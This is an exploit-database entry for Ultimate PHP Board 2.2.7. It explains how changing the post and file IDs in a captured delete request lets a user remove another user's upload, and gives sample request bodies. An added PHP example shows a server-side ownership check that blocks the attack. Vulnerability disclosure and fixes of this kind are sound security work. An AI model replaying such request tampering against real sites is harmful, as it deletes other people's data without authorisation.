0day Today Exploits Market and 0day Exploits Database

Ultimate PHP Board 2.2.7 Broken Authentication and Session Management

Author: i2sec
Risk: Security Risk Unsorted
0day-ID: 0day-ID-16144
Category: web applications
Date added: 20-05-2011
Platform: php
# Exploit Title : Ultimate PHP Board 2.2.7 "Broken Authentication and Session Management"
# Date : 2011.05.17
# Author : i2sec - Gi bum Hong
# Software Link : http://sourceforge.net/projects/textmb/files/UPB/UPB%202.2.7/
# Version : 2.2.7
# Tested on : apache 2.2.14 | mysql 5.1.39 | php 5.2.12
 
This web vulnerability is based on "Broken Authentication and Session Management".
This attack can delete another user's (e.g. the admin's) uploaded file.
 
Step 1.
Analyze the request message of a file delete using the Paros tool.
ex) http-request-message body : ~&postid=2&~~&threadid=1&divname=1-1-2-attach&fileid=3&filename=file.txt~
 
Step 2.
Change the request message to the post ID and file ID/name of the file being attacked.
ex) http-request-message body : ~&postid=1&~~&threadid=1&divname=1-1-1-attach&fileid=2&filename=account.txt~
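
The steps above work only if the delete handler acts on the IDs in the request body without checking them against the logged-in user. The following is an added example of such a server-side ownership check; it is not code from Ultimate PHP Board or from the advisory's author, and the data model, the function name authorize_delete and the session user array are hypothetical.

```php
<?php
// Added example with a hypothetical data model; not Ultimate PHP Board's own code.
// Constructed records standing in for the board's post and attachment stores.
$posts = [
    1 => ['thread' => 1, 'author' => 'admin'],
    2 => ['thread' => 1, 'author' => 'alice'],
];
$uploads = [
    2 => ['post' => 1, 'name' => 'account.txt'],
    3 => ['post' => 2, 'name' => 'file.txt'],
];

// Returns the stored name of the file to delete, or null if the request is refused.
function authorize_delete(array $req, array $user, array $posts, array $uploads): ?string
{
    // Accept only plain decimal IDs from the request body.
    foreach (['postid', 'threadid', 'fileid'] as $key) {
        if (!isset($req[$key]) || !is_string($req[$key]) || !ctype_digit($req[$key])) {
            return null;
        }
    }
    $post = $posts[(int) $req['postid']] ?? null;
    $file = $uploads[(int) $req['fileid']] ?? null;
    if ($post === null || $file === null) {
        return null;
    }
    // The IDs must agree with each other according to server-side records.
    if ($post['thread'] !== (int) $req['threadid'] || $file['post'] !== (int) $req['postid']) {
        return null;
    }
    // Ownership is decided from the logged-in session user, never from the request.
    if ($post['author'] !== $user['name'] && !$user['is_admin']) {
        return null;
    }
    // The client-supplied "filename" is ignored; the stored name is used instead.
    return $file['name'];
}

$alice = ['name' => 'alice', 'is_admin' => false]; // constructed session user
// Request for alice's own attachment (IDs from the step 1 sample body).
$own = ['postid' => '2', 'threadid' => '1', 'fileid' => '3', 'filename' => 'file.txt'];
// Request rewritten to another user's post and file (IDs from the step 2 sample body).
$other = ['postid' => '1', 'threadid' => '1', 'fileid' => '2', 'filename' => 'account.txt'];
var_dump(authorize_delete($own, $alice, $posts, $uploads));
var_dump(authorize_delete($other, $alice, $posts, $uploads));
```

Refused requests are worth logging with the session user and the requested IDs, since a post ID that does not belong to the requester is a clear sign of request tampering.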



#  0day.today [2024-10-05]  #